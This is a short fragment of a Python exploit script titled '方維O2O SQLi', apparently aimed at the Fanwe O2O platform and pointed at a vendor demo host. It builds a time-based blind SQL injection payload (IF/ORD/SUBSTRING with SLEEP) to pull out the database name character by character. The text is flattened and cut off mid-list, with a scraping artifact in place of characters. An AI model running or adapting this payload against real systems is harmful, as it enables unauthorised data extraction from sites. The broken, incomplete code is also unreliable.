方維O2O SQLi
1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 4 from __future__ import print_function 5 6 import requests 7 8 host = "http://o2odemo.fanwe.net/" 9 10 statement = "IF(ORD(SUBSTRING((DATABASE()), %s, 1)) = %s, SLEEP(1), 0)" 11 characters = list(" !\"#$%&‘()*+,-./0123456789:;<=>[email protected]
方維O2O SQLi